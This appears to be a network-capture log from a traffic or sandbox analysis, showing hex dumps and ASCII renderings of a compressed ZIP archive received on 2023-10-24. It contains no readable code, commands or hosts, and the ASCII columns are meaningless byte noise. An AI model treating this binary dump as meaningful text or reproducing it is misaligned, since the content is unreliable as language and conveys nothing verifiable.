                                                                                                    2023-10-24 04:55:21 UTC27INData Raw: 50 4b 03 04 14 00 00 08 08 00 05 6b 1d 57 99 66 37 53 63 8b 42 00 01 a8 5f 00 04 00 00 00 6c 70 31 31 bc bd 77 5c 94 67 b6 38 6e 03 34 b1 cb cc bc 7d 0a 30 74 8c 49 d4 d8 4b 8c bd 2b 20 bd 28 d2 ab 8a b4 e9 03 c3 f4 19 b0 d1 86 19 ca 00 66 93 7b 37 fb dd dd 64 b3 e5 26 b9 d9 bd d9 6c 7a 2c 80 80 58 62 4c 62 8b d8 45 7f e7 79 df c1 68 cc 26 bb df fb fd fc fe 9b cf 33 e7 39 e7 3c a7 9f f3 3c 03 bc d4 82 74 8c 24 48 4a cc f8 f3 f9 02 9c f8 82 a2 19 1e 5f 80 c5 10 b3 3d 9f 70 f8 f6 9f 7c 12 08 b0 2f 42 c8 90 85 9f 33 67 5f fa 94 d8 fd f5 a2 d7 5e cf 94 2b 8d f3 0c 66 a3 d6 56 ac 99 5b 69 31 5b 17 2a 34 b3 ab 4d 55 f3 ac 7a a5 da 36 3b 57 59 b5 7e 7d 90 74 59 e4 2f 60 fe ff ed 53 76 0a cd a4 08 c4 d8 9f 67 4f 50 8e ac dd a3 5e 6d 16 09 f0 59 f8 8e 4d 14 ad 5d
                                                                                                    Data Ascii: PKkWf7ScB_lp11w\g8n4}0tIK+ (f{7d&lz,XbLbEyh&39<<t$HJ_=p|/B3g_^+fV[i1[*4MUz6;WY~}tY/`SvgOP^mYM]
                                                                                                    2023-10-24 04:55:21 UTC35INData Raw: 65 53 14 ed f1 32 54 d1 a2 78 ef b1 97 37 47 de 51 bc 87 f6 86 3c b5 77 fb 9a ed 23 37 f3 c1 e8 9e 13 ea 6c cf 0b a1 08 ee f5 c4 ad 84 18 22 6c 4e 21 7b 4b 1b 99 7b c0 6a d7 a8 57 64 43 46 2c b2 c8 2d 95 8f d1 45 82 46 f9 d2 43 17 f9 02 4b 77 41 2a d8 9a 28 7d 97 ba 22 c3 a8 aa 55 95 af 4b e4 64 bf 21 3e 1a 0b f4 cf cf a8 52 a6 56 96 9b 2b 15 73 47 2c 4c 0c f8 e6 c7 79 2c 4c 9c 53 66 31 12 b8 21 2c 9e bb e1 15 ef d4 5b ed 0a 4d 69 05 b7 c6 de 4f 07 a0 8c 9d ae d1 1b 4b 75 e8 e6 d1 22 45 b9 16 bd c1 48 2d 36 94 8c bc de c6 04 d5 21 9e 77 0a 92 2c 39 c4 12 5b 4d b1 b6 0c 7a dd 0f 91 2f b0 77 cc e8 0d 41 a2 56 a6 e3 6e 1e c3 d9 b5 5c 95 4d a3 33 a1 fb 5a c4 f3 68 e0 39 3c 30 3b 4f 6d e7 ba 8e 5c 95 52 12 ef 79 83 11 90 16 c9 0f 08 c8 cd 51 5a b9 3c 93 ad 90
                                                                                                    Data Ascii: eS2Tx7GQ<w#7l"lN!{K{jWdCF,-EFCKwA*(}"UKd!>RV+sG,Ly,LSf1!,[MiOKu"EH-6!w,9[Mz/wAVn\M3Zh9<0;Om\RyQZ<
                                                                                                    2023-10-24 04:55:21 UTC43INData Raw: 46 ef bb c7 de ba 49 5a e9 c5 7f f6 87 5c 96 5f d8 3b 3a 06 d6 de a1 c1 ee 8b f6 22 1b ca 58 f5 bd ea 57 12 c8 a6 7e 75 8c 30 b6 e5 35 3f c8 6a 13 6f 3b bf de 0b 75 6c c1 a6 ab 8a a3 22 88 98 62 97 94 de e1 7c 55 0c d5 c8 5d d7 6b e0 dd 1a 22 f7 de 9a e5 47 7a 84 37 cf 40 2c e9 bc ec ec af ef 7e 53 e9 f0 9a 0b ce 72 41 5e 7f ff 2e d9 79 fa a4 5b fa 09 b3 1c e5 69 64 ed 68 2e a0 79 67 11 d0 1d ba 3f b4 e6 15 b9 9e df d3 a9 21 86 76 2c 2b 3e e9 5e 7d 72 ab 70 7f 4e 2d a3 a7 d2 03 ff 36 67 c9 5e d6 17 32 db 86 da 44 cb 5c 53 45 7a e1 07 cc d8 f7 a1 b2 74 f5 b4 86 2f 0e f9 5c 2c ca 2f 44 f7 74 39 1d 37 bb 7c 9a c9 85 8d 58 80 c5 ff 63 fc 41 93 2f 54 2d 67 a0 53 97 2c 70 86 93 fb ca 4a 06 77 c3 b7 9f f9 81 5b 76 89 e7 4b 3f a6 c9 e6 cb 76 89 f8 d0 18 62 51 dd
                                                                                                    Data Ascii: FIZ\_;:"XW~u05?jo;ul"b|U]k"Gz7@,~SrA^.y[idh.yg?!v,+>^}rpN-6g^2D\SEzt/\,/Dt97|XcA/T-gS,pJw[vK?vbQ
                                                                                                    2023-10-24 04:55:21 UTC51INData Raw: da 08 47 81 9e e0 86 cb 25 c2 a8 b8 aa 19 4c 5d 1b 60 c2 f6 67 a5 35 d4 f5 d9 ea 2d 62 c0 25 b0 0a 3e 4c 14 c7 ad a5 6f 5b e0 d7 9d aa 00 d9 4d 4f 84 4f 7b 7e e5 e4 aa 1b 4c d2 0a ca 9f 7f f5 c1 ef 24 60 f3 3a 3c 40 b7 2f 7f e8 f7 dd 27 82 63 e5 62 ef 6b c3 ba b9 01 fd e3 44 5c 5b 67 cd 24 93 3f a9 ee d7 1f 5a 60 aa 9c 2f a8 5a 20 ae 5d 6a dc 75 1b 65 c7 cc fc c3 a1 43 db 7a 0d 84 08 b4 80 cb 8b 85 bd 31 7d 1d ee 80 27 d3 5b 23 0a 99 1d fc a2 92 b6 88 b8 e4 4a f1 57 4f 6b e6 a8 22 52 e1 17 56 e3 79 33 2a fb bc 50 18 90 9f 5e 4b 9e a1 af 84 2f 25 93 4b 17 97 be 3c 53 2f 3c 31 8b f5 e8 26 41 66 f0 1f 5c 13 89 4b 09 f3 be 35 8a 84 13 f8 f5 4f 2f 47 52 bc 27 32 91 38 b9 d4 89 7b f5 36 a0 dc c9 af bf 03 cd 3a a0 dc b9 19 69 9f da 39 67 25 c5 f7 4f 54 e2 27 5f
                                                                                                    Data Ascii: G%L]`g5-b%>Lo[MOO{~L$`:<@/'cbkD\[g$?Z`/Z ]jueCz1}'[#JWOk"RVy3*P^K/%K<S/<1&Af\K5O/GR'28{6:i9g%OT'_
                                                                                                    2023-10-24 04:55:21 UTC59INData Raw: ed 6f 74 4f 3d 0d 4a d4 43 2d ce d1 e3 9b 30 9c 88 9d 09 bf d4 7b 70 4d 8c a3 71 bf 83 25 94 6a ed a8 92 1b 29 a0 15 9b da d2 a9 db 37 cb 3c 38 ab 74 66 4b a7 82 3b fc 2d b3 9f dc 3f 88 fa 67 0b 55 59 80 32 dc fd bf 69 b1 17 83 2f f9 aa 29 44 dd c2 13 55 2c d6 8f fa 7d 9d eb aa ee d9 3c c8 d6 01 56 c9 51 c7 db 32 79 78 bc 10 d4 a9 df d7 70 cf ff 9b 34 7b cd 28 aa 4d 0b bf 0e ef 8b 92 e9 b3 dc 6c de a1 4a d6 68 b9 6e 0b 60 51 f5 bb fc 2e 39 81 f6 99 ca b6 58 f3 41 1c e8 18 c7 ca 35 29 ba 3b db ee 81 7f a4 4d f7 93 a1 8e 72 ea 18 b7 b6 a1 6a 0f d3 9c cc 71 df 19 62 2c 57 69 e3 c9 0f fb 12 90 5b 6f 26 c8 d1 48 39 69 87 45 b9 69 de d4 fb f2 45 f1 2e 35 be e9 59 a6 7e 61 84 33 fb f7 88 bc 19 2a ef 3c a6 de 5e c1 13 86 39 33 fb d3 7d 65 b8 76 af b0 57 39 c0 3e
                                                                                                    Data Ascii: otO=JC-0{pMq%j)7<8tfK;-?gUY2i/)DU,}<VQ2yxp4{(MlJhn`Q.9XA5);Mrjqb,Wi[o&H9iEiE.5Y~a3*<^93}evW9>
                                                                                                    2023-10-24 04:55:21 UTC67INData Raw: 2d 7d 03 d8 e0 f9 a3 9c 0d e6 4a 50 7d 7e f6 2e 38 35 91 eb 07 49 9b 58 9f 54 37 5c c5 ea 35 6f 65 60 9b a9 c0 33 f4 12 64 33 63 fc dd 5b e7 05 75 c8 7b c3 da 2e 6a db 8a 1f 6a 2d 8c 63 63 3b 3b 9d ac 31 7f b5 fb 72 54 d6 3d 55 d4 33 27 b7 1a 95 b4 b4 64 7a 79 2d 9e 8d 47 96 b7 f2 2f a8 46 7c 90 fc 6e b1 7a c5 c7 37 7e 79 e7 cd 3a a4 a2 be 5d ef 1b 71 1d 4a 1a f8 e0 e6 77 8b c3 9b 24 28 b6 e9 ef a1 d8 3e c6 7d 68 e2 f8 dc 3d 78 e5 87 68 32 fe 6e 7d 7f 22 6e 8b 37 48 fa 22 ea ee 2b db 53 c7 cc 42 f4 d5 89 50 5b f2 f6 71 34 16 fa 00 fb 43 42 e9 e5 51 5e 17 77 4e d1 18 5f 0a d7 bf 5a 79 0d b9 db a4 b7 86 47 e6 64 6a 6f cd d7 8d d5 9f 6d 82 40 4c 0f 6d 40 e3 19 be 50 14 f7 e5 85 12 cd a6 4e 36 b0 e6 4d 93 3e 26 9e 14 fd 59 22 ef cd ac 6a 14 72 e3 d0 bc 3a 14
                                                                                                    Data Ascii: -}JP}~.85IXT7\5oe`3d3c[u{.jj-cc;;1rT=U3'dzy-G/F|nz7~y:]qJw$(>}h=xh2n}"n7H"+SBP[q4CBQ^wN_ZyGdjom@Lm@PN6M>&Y"jr:
                                                                                                    2023-10-24 04:55:21 UTC74INData Raw: 94 e8 eb 8b cb 72 2a 25 b0 da 4c da f1 7b 52 f2 b8 b9 52 69 79 a0 b3 c6 ea 0d 8c 59 8d 94 16 a1 7a cf 3d 4b 4b 81 55 69 69 55 d4 64 e3 9e e1 76 5c a6 59 c7 4f 91 eb cb 5d d1 f6 12 67 c0 df 9e a9 c8 23 f1 ce 95 a1 78 35 a6 2a 9d de d0 ac ab ac ab 6d 52 c7 6f 41 23 35 07 fd 4a d6 bb c5 f9 a8 af f0 20 4b 61 d7 0b b0 86 58 79 a1 dd ea 76 8a 49 3f bd 49 92 25 d4 a4 b6 95 55 15 e4 e5 36 e9 8a cb 0b 8d 65 25 eb 72 f2 aa d2 e0 0c 12 81 04 bd f1 71 9a 8e 48 a6 e5 7a 8b dd 6c 75 9b c5 d4 39 3c 13 8d 67 93 93 f5 ed 01 5b 9b af dc 52 6d 25 3b 02 50 3b 3e 33 9e 37 55 8d d3 67 2f b2 fa 8d c8 16 bc 41 96 e1 ab d6 09 f0 79 cd 6c 26 59 6b b3 84 ea 82 f5 5b 1d 2d 1e 57 8d d1 ec 73 48 79 77 69 b2 44 6a dc 9f 2b 4b 43 6e a3 35 6c 70 36 44 9c ad 5e 77 98 a1 cf a7 af e5 e3 b1
                                                                                                    Data Ascii: r*%L{RRiyYz=KKUiiUdv\YO]g#x5*mRoA#5J KaXyvI?I%U6e%rqHzlu9<g[Rm%;P;>37Ug/Ayl&Yk[-WsHywiDj+KCn5lp6D^w
                                                                                                    2023-10-24 04:55:21 UTC82INData Raw: 5e 90 5e 16 4e a1 44 4c 8a e4 01 d9 97 c2 2b d4 4a 26 57 52 23 db 24 ba 42 5d a5 af b1 a3 e8 57 af 78 1b b3 57 b2 5f b6 11 3d 3b 2a 3e 28 c1 cf b8 5f 9f 91 1d 16 9d 13 a3 90 64 ba ec b2 50 40 6b d9 c5 d2 d5 f2 47 a8 47 e9 15 ec e3 d2 27 be 15 5a 4f e3 37 6a e4 9b 28 2f bd 8d dd 2b dd 2f 7f 9d 3a 42 9f 67 af 49 a7 cb 79 62 0d b3 50 72 50 3a 22 5f 2e 5e cf e8 25 67 25 66 85 5b bc 95 39 ca ee 95 ed 57 bc 2e 16 30 47 25 fb a4 87 e4 87 a9 73 cc 55 c9 34 19 a3 e0 d1 1a 76 a1 74 95 3c 5f 59 46 37 b3 67 98 a0 7c 97 f2 39 f1 11 7a 58 ba 4f 7e 48 c9 13 1f 61 cf 4b 77 ca 46 e4 97 e9 29 ac 48 26 96 a5 a9 ce d2 cf 23 79 8b 15 ab 55 6b 19 01 a3 97 19 15 61 d5 65 e1 56 c9 b0 6c 9f e2 09 f9 eb cc 57 24 47 23 aa b3 cc 15 09 4e f3 74 15 8f d5 48 17 ca 57 29 f3 d5 38 1f 7a
                                                                                                    Data Ascii: ^^NDL+J&WR#$B]WxW_=;*>(_dP@kGG'ZO7j(/+/:BgIybPrP:"_.^%g%f[9W.0G%sU4vt<_YF7g|9zXO~HaKwF)H&#yUkaeVlW$G#NtHW)8z
                                                                                                    2023-10-24 04:55:21 UTC90INData Raw: 75 3a 7a 59 c6 fc 6e ee 0c e0 29 cd 40 04 91 54 cb fe b1 d3 44 97 ce f4 86 10 6d d5 b1 48 b8 b1 ab 7d 49 97 a3 ce 2a 67 11 9c 82 64 d5 57 00 ef a5 32 66 ae 33 e0 01 af 77 25 d8 0c 4d 73 b3 6a 65 d2 4a a4 93 1c 2b 97 12 30 5f 35 bd 76 6f b5 44 6b b1 c7 90 6d cd 0c f8 ba 66 9a ce 3a 8b ec 60 7e ff b3 e8 69 62 77 b5 84 86 59 ce 8e c1 6f 78 0c 94 b3 a2 ed b6 38 45 1a de 2e 31 83 07 26 48 64 0b 33 b9 d0 0e 3d a1 ab 71 25 1a 62 4b 16 7b ed c8 b6 14 bc e5 29 29 2e 53 d2 bc 64 18 46 35 db db d1 99 a0 29 23 b2 37 02 f2 3b 06 70 a9 92 38 5e 33 90 da 5a 77 4f 8a 1b 52 2d c2 85 39 27 2e 0c 5d c7 fe 75 47 95 ac b0 da 19 9f 13 75 2f f2 74 d6 98 11 4f e7 2e f2 76 d2 e4 08 c8 f4 75 12 42 7e c9 0e 23 f2 02 73 6c 5e 07 e0 8c d6 95 c9 54 99 36 6d e6 4e 6d d7 13 72 a0 03 6c
                                                                                                    Data Ascii: u:zYn)@TDmH}I*gdW2f3w%MsjeJ+0_5voDkmf:`~ibwYox8E.1&Hd3=q%bK{)).SdF5)#7;p8^3ZwOR-9'.]uGu/tO.vuB~#sl^T6mNmrl
                                                                                                    2023-10-24 04:55:21 UTC98INData Raw: 44 1d 42 ef 4e 48 42 39 c7 b5 34 5d 23 ce b7 da 1d c4 b4 cf cc 8c 76 7e 57 43 24 ec 09 7a c4 6f 6d 64 e5 02 d3 71 2e c0 72 c8 66 e6 93 b5 9f 5b 58 5d 83 af 31 1a f1 86 bc 0a e1 8b 36 f2 7e 2d 2f b7 2d b4 38 14 15 62 bc 90 b9 e9 da 42 c1 3a 7b c0 1d ef 12 66 56 09 33 4f 25 d7 83 87 d3 41 65 87 b2 af b8 82 7f 4f d2 27 2f ce b6 69 a6 8e fb f2 23 3d a1 6c 76 25 aa fd 8b 82 61 7c d3 bb 8f a4 f9 5d 4e c8 22 45 5c ea 78 5c 52 d9 35 cb 8d 19 89 ce a6 b4 e0 7b e0 86 6e 6f c0 e5 49 0c 1c 70 f6 ef 65 28 38 59 38 87 bf 13 fc 5b 9a bf 13 bc 83 c0 7b 5f 60 51 33 18 3d 47 21 4d 8c b1 bc ed 2f 7d c7 48 45 3e b3 a6 df c3 7d 50 2a 53 9a 3b a3 0e b7 23 9c 40 79 ce eb fb ab 25 b5 1f 1b b2 6e fd 6a 6a 6c 3e 67 cc 83 e4 36 f0 ad fe be 83 a1 aa ef e8 15 eb 6e 92 ba 8f ca 7c bf
                                                                                                    Data Ascii: DBNHB94]#v~WC$zomdq.rf[X]16~-/-8bB:{fV3O%AeO'/i#=lv%a|]N"E\x\R5{noIpe(8Y8[{_`Q3=G!M/}HE>}P*S;#@y%njjl>g6n|
                                                                                                    2023-10-24 04:55:21 UTC106INData Raw: f0 3b 9f c1 67 d7 cb 21 3d 2b 9f 56 4e 51 f7 89 23 81 ed e7 65 ec e1 94 28 04 88 ee b1 ea 59 b5 83 8e 5f ba c2 10 ed 12 78 31 1b e5 a1 c7 05 28 56 e5 46 d6 12 ba 48 07 ff 0b 99 02 8e 4b 25 d0 42 15 4e c6 6b 57 a0 e7 7d ec c7 72 8c e0 76 81 27 a0 07 df 52 8e 29 43 22 b4 dc 1c 59 0e b0 9e d1 9b f3 39 68 a1 73 0f 68 89 43 8e 98 29 59 0f 01 e7 a2 86 ef 1c 03 5a b2 10 cb 8d 91 b1 3a 0c 37 0e 81 b9 68 da 97 f4 dc f3 3c 29 d2 3c 12 68 7b c9 6b c6 27 e6 eb bc 1f d7 03 3c d9 bd ec da 23 a4 12 97 df c1 81 5e 15 84 9e 89 f4 28 d2 49 54 d7 45 56 47 db ec fb 39 ff 92 8f cf be 15 f4 c7 9e 06 fb 33 f7 ad ec bc ed 56 43 29 ef 53 96 5b 58 af 6e c0 d0 c7 2e de 4a f1 c3 9e dd e5 d7 09 d5 8f 85 9a 76 e2 2a e5 19 74 29 01 2b 50 0b 57 b7 ef d9 93 57 62 96 16 5d 00 bb 66 89 77
                                                                                                    Data Ascii: ;g!=+VNQ#e(Y_x1(VFHK%BNkW}rv'R)C"Y9hshC)YZ:7h<)<h{k'<#^(ITEVG93VC)S[Xn.Jv*t)+PWWb]fw
                                                                                                    2023-10-24 04:55:21 UTC113INData Raw: 24 a1 a7 d8 63 83 93 9f ca d9 1b 20 2d ed 86 79 7e ca 33 e0 49 d3 8f 6e 9c e0 af 7e e1 43 d1 47 9b 36 ce af 78 0f 46 05 eb bc b5 69 8f 0d bb 27 af ef e6 ad 77 87 1e 2f 87 e0 cb 53 0b d4 fe 8a 2e 4a 15 ef 24 6e 3a e2 40 b0 fe 01 5a dc 8c 98 00 21 72 82 b9 8f e7 90 03 ed f3 20 8d 0a c8 0d 4d de 5d ae 50 dd 27 de e0 54 e1 03 50 c6 50 be 2d 1b c3 61 cb fe 07 35 95 9a fe 25 3b ef de e7 d7 8b b5 b7 10 83 12 66 1a 5b 72 6f 8e ba b9 62 b8 45 0b f7 c0 f0 11 7c 77 05 56 28 66 94 ed 04 c8 52 1f 08 1e 4d 99 9d 9c 39 6c 5b f6 89 bf 29 fb 99 35 21 68 d5 55 e6 57 7c 92 02 73 de 58 21 51 f6 08 2d 8a 56 66 90 3e 06 20 46 0f 98 81 b3 79 73 95 78 3d a5 bd 8a c1 9c e8 6a e9 f5 44 06 2a ef 24 b9 a2 6b 09 4e 02 f5 9e 3b c5 ca ad cb 6a 83 ba 22 27 c2 4f 58 81 99 32 4e e8 3a 99
                                                                                                    Data Ascii: $c -y~3In~CG6xFi'w/S.J$n:@Z!r M]P'TPP-a5%;f[robE|wV(fRM9l[)5!hUW|sX!Q-Vf> Fysx=jD*$kN;j"'OX2N:
                                                                                                    2023-10-24 04:55:21 UTC121INData Raw: 04 9b 6d 85 b0 7f 9c 48 f2 65 97 dd c1 4c 29 c5 12 58 1b 77 ed 26 60 d3 7d 0e 31 b0 69 52 b4 f9 14 b4 c1 c8 6b 66 0d 06 f0 f8 68 1d 0f c1 4d 5a b8 8e b1 50 30 03 f3 c3 d3 3a 1b 42 d6 40 b4 3e 1a 56 08 28 f1 33 2e d4 29 3d cc f3 b3 08 ca 69 89 b6 19 f6 9c 76 4a ff 12 de da b2 f7 b2 b2 ef 22 fc 0e 16 17 56 05 d1 7f 3c 0a a9 b3 73 54 39 1d c5 d7 75 ed db 97 71 40 13 50 22 6e 88 a1 4f cb 5f 81 9e ed 78 72 6c 32 82 99 6d 63 8c af e8 21 58 91 ad 3e 83 cd be 6c df 04 91 65 72 08 40 96 fd 6f bc bf 28 16 65 3f 8f f1 0a 0c 37 ad 5b bc ad 8c 3c 30 f0 78 3c c0 ee 17 d0 f6 ea c3 e7 7e c4 89 07 56 db 9e 0e 09 c4 98 74 a9 37 52 21 31 5e 37 f7 6e bc 3d ba 14 c1 70 e8 03 00 b6 55 86 61 82 dd 57 a0 6b 37 dc 30 3d e1 4e f6 82 29 b5 5d 3e b6 da a4 1e 7a 27 e3 5c 07 61 bc a6
                                                                                                    Data Ascii: mHeL)Xw&`}1iRkfhMZP0:B@>V(3.)=ivJ"V<sT9uq@P"nO_xrl2mc!X>ler@o(e?7[<0x<~Vt7R!1^7n=pUaWk70=N)]>z'\a
                                                                                                    2023-10-24 04:55:21 UTC129INData Raw: db 83 4c 4e d1 75 19 c6 68 ae 66 79 6a 5e d2 b5 8c 1c 7d 6a cc 92 ab b9 f6 ba 16 73 cf 83 b7 46 5d 98 0e 12 f1 cc 1e 98 07 f6 ab 9c 75 0a 85 df db cd 8e 41 ff 51 54 d6 e7 4d ac 2e 51 c8 b2 7c d8 7c f6 3d b2 3e 69 91 88 d0 44 ba 1b 0b 25 9c 57 2a 9a 3d 56 17 5e d3 8c c8 f6 b1 d8 63 fb 07 8a 80 3f 8f 34 5e 5e dd 7f e6 20 fc ea c4 bd 3c fd 0a 16 cb 2b 84 f9 be 43 e6 29 e0 cd ba 60 d7 c6 8a 26 8f 55 85 23 d3 fa 0e 14 8a 08 94 f1 17 77 60 ff 9e 64 92 89 b5 1f ad c9 90 c1 6a a4 49 4e ef 29 c9 27 3f b1 9b 07 3c d1 d6 97 1d 01 e8 ab 15 c5 70 ba 1f 9a ea d7 0c a4 96 a0 0d 65 33 c3 3b cf 66 57 c0 ea 62 53 86 9a a6 42 df 8b 18 5d c9 39 da 22 a1 0d a9 e4 99 5d b0 1f 9f f2 fa 98 0a f2 b5 69 aa 96 22 cf 8a eb b9 9e 0b 1f a5 f0 96 14 0b 44 dc 97 6a 7a 0a c6 68 2e 64 7b
                                                                                                    Data Ascii: LNuhfyj^}jsF]uAQTM.Q||=>iD%W*=V^c?4^^ <+C)`&U#w`djIN)'?<pe3;fWbSB]9"]i"Djzh.d{
                                                                                                    2023-10-24 04:55:21 UTC137INData Raw: e8 06 cd eb d9 2a 87 43 eb 74 c4 92 fb e8 1d b2 f7 45 f9 6c 7e f7 0b 36 e9 35 d7 ad 59 4c e9 e2 c0 f3 dd 7d 81 db c5 84 2e 81 60 ea 78 3d 15 0f 41 5a e9 37 59 a4 35 b1 15 91 96 db 29 16 69 c1 d7 d2 37 0c d2 5a 2f d0 1a 93 e7 f5 c3 d5 21 b4 e6 df d0 c6 6b fa 00 e4 f9 1a d0 62 8c dd 7d 35 58 ef e6 99 f5 cd c7 cc 6f 6e 6a c1 37 7f fb dc 9b 99 33 ad 6a 70 62 a9 18 34 af 19 a7 f6 5f 0f a7 74 0a 46 8a 07 a4 bd 28 4d c7 b7 83 34 8d b8 44 09 96 64 b9 97 4c d7 2e 9e 73 39 64 2a 45 a4 ee a2 0c 01 fc f0 1c cc 86 f1 bd 11 29 eb 73 68 15 13 b6 13 2f 82 3c 6a 19 d8 f2 07 68 40 3d 8a 04 19 f0 92 19 3e 80 e5 9b fb e3 9f 89 24 b2 4e 63 86 44 43 85 62 3c 52 84 0d 9c c1 76 ba 4b 1f a5 a8 93 7c 94 61 f3 c9 17 b0 f6 dd 7d b3 9e c2 fe 76 c9 af 00 fa d7 8e de 07 f7 95 7d 85 5c
                                                                                                    Data Ascii: *CtEl~65YL}.`x=AZ7Y5)i7Z/!kb}5Xonj73jpb4_tF(M4DdL.s9d*E)sh/<jh@=>$NcDCb<RvK|a}v}\
                                                                                                    2023-10-24 04:55:21 UTC145INData Raw: ee 3b eb 89 03 d9 8a a1 f3 ba 6b 4a 09 cd 45 13 f7 5f 85 4e cf 3b 4e 61 84 c3 3f d8 5c f6 23 b8 73 c2 ae b2 93 22 3c 8f 81 75 6e cd a7 c4 96 0b 3b 89 a1 7c 4a b0 27 b7 e1 62 b0 17 6e a8 31 d8 49 5c 61 3e 02 59 bb a7 1a d6 f9 a0 6c 83 62 88 b5 df 85 27 84 e2 5c c6 12 e9 6a d5 5f d8 96 5d bf b3 ea 2f ce 57 c4 4e a0 bf 5c 57 49 4f eb 95 43 3b e4 4c ab 25 cd 59 7f d9 e8 db 5b d7 61 2c c8 e7 6b fd 31 68 39 c1 62 d0 7b 0b e0 cb a0 5b 00 17 ee df 53 24 8a ed 20 fd 1a 79 e3 46 1a c5 a4 93 3d b2 da 58 3b c0 b6 16 ee 56 73 ef b2 ce da e3 34 b3 f4 36 c8 a6 bb 18 49 dd 58 45 60 86 f6 ba a7 65 41 02 af 2a 37 6c ab 45 8a 3c c5 f6 5e f6 32 76 b0 73 04 bc fb 3f 41 20 63 cf 30 42 11 92 b1 16 f7 64 7d 0b 7e d9 62 ba 82 f2 06 d9 62 81 94 d5 72 b1 40 f2 bd 0b 24 27 7b 84 38
                                                                                                    Data Ascii: ;kJE_N;Na?\#s"<un;|J'bn1I\a>Ylb'\j_]/WN\WIOC;L%Y[a,k1h9b{[S$ yF=X;Vs46IXE`eA*7lE<^2vs?A c0Bd}~bbr@$'{8
                                                                                                    2023-10-24 04:55:21 UTC152INData Raw: be ad 72 8e fe 51 b5 83 94 92 d4 55 d2 d5 f6 4c 89 9f e3 38 cb 55 dd ed 9e 68 21 41 3a 85 34 5f d0 df e1 35 60 24 35 c8 ab 2b 5f 28 c6 d7 23 9f 72 e4 e1 67 f7 f8 2d c0 2a 90 8d 90 f8 4d 0c 9b 2f 35 c0 74 c7 fc a8 c5 5f 84 ef e1 7d 06 ac 93 be f9 62 f7 b7 4b 81 f6 63 53 1f ad c0 7a f4 ab c4 c8 37 c5 47 7f d3 78 ff ac 0f f0 69 d7 2e 10 ee 82 c5 0e ef 86 01 4d 43 5c 1f 28 69 41 ae c6 0d db 77 a9 34 a8 e9 5e f3 9d 93 34 f0 29 7f 23 58 fe 76 3e bc af 96 b1 11 ea 2e f6 38 ad 63 73 4e f6 ca ab 77 e6 f5 97 57 a6 b7 60 8e 16 7f 61 93 57 75 a0 29 f4 34 6e 83 39 6a d9 dc 4f 5e ed 9f cf c9 ab e7 9b d9 fc 1f eb ad f2 8a cb 67 53 26 16 e3 59 d7 24 0c 33 20 4e 0c 8a f6 61 89 24 92 e2 63 7b e6 f7 a0 f6 68 a1 08 65 1b 49 4d 16 cc 7b 01 5c 77 1c 47 f1 96 5c e6 28 85 b2 4d
                                                                                                    Data Ascii: rQUL8Uh!A:4_5`$5+_(#rg-*M/5t_}bKcSz7Gxi.MC\(iAw4^4)#Xv>.8csNwW`aWu)4n9jO^gS&Y$3 Na$c{heIM{\wG\(M
                                                                                                    2023-10-24 04:55:21 UTC160INData Raw: 1b 7d 06 dd 7f c4 65 96 a7 d8 6e 69 0d f7 c0 b6 72 10 77 23 2f 4c 3b 62 cc 0f 9f ee 14 81 35 66 57 06 3c f4 62 ed b0 0f 7a a3 82 ec 49 41 51 41 04 8e 47 1e 60 e2 2b fc 07 8b 50 54 90 27 2a 57 d6 92 fb a3 6d 15 b4 66 a0 6d 75 e8 24 ec 33 1e ff 37 db 2a 09 dd 66 3c f4 3d 45 07 9c bd af c3 41 f3 6d 61 35 df 83 82 24 39 1e 99 a6 a6 d3 36 86 63 15 a9 4a 52 bf 5e 23 69 4a 06 69 0b b0 13 00 bb 04 b0 47 00 db 9f 22 c7 8f ad 53 d3 76 00 db b7 56 49 be bf 41 23 39 6a 85 61 00 f3 01 d8 4c 80 2d 06 58 3c c0 d2 37 85 83 e5 6a 90 cc 42 54 eb 49 a5 90 2f d3 bd c6 42 4c 5c ec bb ad c5 83 c9 3b 21 16 f3 1a ef 22 aa 01 75 f5 60 d1 0b 96 81 55 f4 0c 56 ed e4 d9 87 9d 66 81 65 f3 44 e5 f5 3c 74 ee 7b 3d 13 a1 ee 93 08 9f 17 63 a7 7e 60 17 c4 b0 2b be 01 2c 7f 95 1f db 32 7a
                                                                                                    Data Ascii: }enirw#/L;b5fW<bzIAQAG`+PT'*Wmfmu$37*f<=EAma5$96cJR^#iJiG"SvVIA#9jaL-X<7jBTI/BL\;!"u`UVfeD<t{=c~`+,2z
                                                                                                    2023-10-24 04:55:21 UTC168INData Raw: 6b a7 34 1f 8a 96 02 45 64 7a 01 f4 45 65 9e 7f 81 3f 28 d3 a8 13 cf 38 31 7c 3e a8 07 07 f8 5d 0d f0 86 5d 58 01 5c 11 c3 76 44 f8 c2 6e 85 74 ed d6 c2 40 d8 ad 79 7c 0e 26 35 66 46 9e a9 bf e3 7c 4a 21 5e 31 82 cf b0 fb 26 7c 6b 07 df d6 5c 39 5b 53 13 84 2f b8 4d dd fb 13 18 cf 6a e7 78 82 4d 3e e7 c2 b5 e7 7d 25 27 56 c6 ae b9 dc 2b 83 e8 59 e1 57 70 f4 ca 25 e8 45 c3 78 a9 ba 76 79 b6 53 de f0 e4 2a b1 43 f6 bb f1 ef 90 de 05 1f f7 09 04 9a fc d5 17 2c bc 9c ca 8f af 55 e6 92 e0 50 a5 5e e0 64 f1 27 28 ca 7c c2 37 fc 69 ed 76 3f f0 e3 c3 41 af 86 a9 cc f6 07 00 a4 9e 5d 74 65 f0 82 15 7d 58 7b df ed 2c d1 71 f8 0d 92 aa 6a 2a 1a 0d e3 c5 c2 78 75 d7 2f cc a8 f4 26 6a b8 49 a2 d4 81 56 f8 6e cc 01 2c 85 b4 e3 0a b9 c9 d5 03 14 bd 26 2e fa 22 c0 c7 b1
                                                                                                    Data Ascii: k4EdzEe?(81|>]]X\vDnt@y|&5fF|J!^1&|k\9[S/MjxM>}%'V+YWp%ExvyS*C,UP^d'(|7iv?A]te}X{,qj*xu/&jIVn,&."
